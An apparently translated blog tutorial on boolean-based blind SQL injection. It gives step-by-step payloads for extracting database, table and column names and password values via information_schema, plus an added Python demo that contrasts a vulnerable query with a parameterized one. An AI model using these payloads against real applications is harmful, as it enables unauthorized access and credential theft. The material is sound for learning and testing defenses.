SQL injection-blind injection

The principle of blind injection

Preface

Blind injection is a type of SQL injection, used mainly when there is no display position, that is, when the query result is never echoed on the page. The page does not report an error either; instead, the page rendering normally means "yes" and the page coming back empty means "no". From these yes/no answers alone we can determine the database name, the table names, the column names and the field values.

The first step is to determine the closing character

We enter 1' and find that the page comes back empty.
We then append --+ after 1' and find that the page returns to normal.

Guess the library name

Once we know the closing character, we can inject SQL statements to guess the database name.
First, 1' and (length(database())>1)--+ determines the length of the database name; keep modifying the value 1 until the yes/no answer flips.
After a few attempts the length turns out to be 8.
Next, guess the database name through its ASCII codes:

1' and (ascii(substr(database(),{1},1))>{97})--+    (the curly braces are not part of the payload; they mark the values to change)

By changing the 1 in the first pair of braces we move through the letters of the database name in order;
by changing the 97 in the second pair and using binary search, we determine the ASCII code of the letter at that position, hence the letter itself, and finally the whole database name.

Guess the data table name

1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1)))>{101} --+    (the curly braces are not part of the payload; they mark the values to change)

The method is basically the same as guessing the database name: judgments are made by modifying the values in the braces.
Note that there are usually several tables; change the 0 in limit to step through the other table names until the table we need is found.

Guess the column name

1' and (ascii(substr((select column_name from information_schema.columns where table_name='{users}' limit {0},1),{1},1)))>{100} --+    (the curly braces are not part of the payload; they mark the values to change)

There is one more variable in braces here, the table name: users can be changed to the table we want to query. The variables in the other braces are used exactly as above.

Dumping the field values

1' and (ascii(substr((select {password} from {users} limit {0},1),{1},1)))>{1}--+    (the curly braces are not part of the payload; they mark the values to change)
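The following script is an added illustration, not code from the original post: it reproduces the yes/no oracle that every step above relies on using an in-memory SQLite table, and puts the vulnerable string-concatenated query next to a parameterized one so the defender can see why the same probe stops working once input is bound as a value. The table, its rows and the probe strings are constructed for the demo, and database() is replaced by a column value because SQLite has no such function.

```python
import sqlite3

# Constructed demo data standing in for the target application's database.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    conn.commit()
    return conn

def page_vulnerable(conn: sqlite3.Connection, user_id: str) -> bool:
    """String concatenation: the leading 1' closes the literal and the trailing
    comment swallows the rest. True means the page shows content ("yes"),
    False means it comes back empty ("no")."""
    sql = f"SELECT name FROM users WHERE id='{user_id}'"
    return len(conn.execute(sql).fetchall()) > 0

def page_parameterized(conn: sqlite3.Connection, user_id: str) -> bool:
    """Bound parameter: the whole input is one value, quote and comment included,
    so it can never change the query's structure."""
    rows = conn.execute("SELECT name FROM users WHERE id=?", (user_id,)).fetchall()
    return len(rows) > 0

# The length-guessing probe from the article, with database() swapped for a
# column value so it runs under SQLite ("-- " plays the role of "--+").
PROBE_TRUE = "1' and (length((select name from users order by id limit 1))>3)-- "
PROBE_FALSE = "1' and (length((select name from users order by id limit 1))>10)-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true probe  :", page_vulnerable(db, PROBE_TRUE))     # True
    print("vulnerable, false probe :", page_vulnerable(db, PROBE_FALSE))    # False
    print("parameterized, any probe:", page_parameterized(db, PROBE_TRUE))  # False
```

With concatenation the two probes give different answers, which is exactly the one-bit oracle the binary search above turns into letters; with the bound parameter both probes return "no", so the oracle disappears.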

Some new friends may have noticed this long ago: the hand-written notes really are one question a year, and I can't bear to look at them anymore. It's not you who trips me up, it's the various tools. I'll write about the detailed usage of those tools later; other people's blogs cover their usage too. I'm a rookie, so let's explore the tools slowly. There is also the script; once I've written it I'll share it with you. This article is only the simplest basis for blind injection. When you meet most challenges, remember to adapt accordingly: first find a way to get a yes or no answer from the webpage, then inject the statement.
For example, given a login box where you are shown the flag after logging in with the universal password, we can treat a successful login as "yes" and a failed login as "no" and do the SQL blind injection that way. For
example, 1" or (length(database())>1)--+ simply follows the or with the blind-injection clause; again, remember to adapt accordingly.


Source: blog.csdn.net/weixin_46148324/article/details/104739749